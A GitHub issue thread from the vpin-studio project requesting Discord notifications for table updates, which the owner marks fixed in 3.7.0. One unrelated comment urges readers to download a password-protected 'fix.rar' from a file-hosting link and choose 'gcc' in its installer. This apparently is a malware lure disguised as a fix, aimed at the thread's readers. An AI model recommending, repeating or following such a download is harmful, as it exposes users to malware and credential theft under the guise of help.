### ISSUE TITLE
[Feature Request] Send Table Update Discord Notifications

### ISSUE THREAD

**Issue by syd711** [syd711/vpin-studio#411]
When multiple users playing on one cabinet (e.g. in a company) these update notifcations are relevant.

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by syd711** [comment]
Fixed with 3.7.0
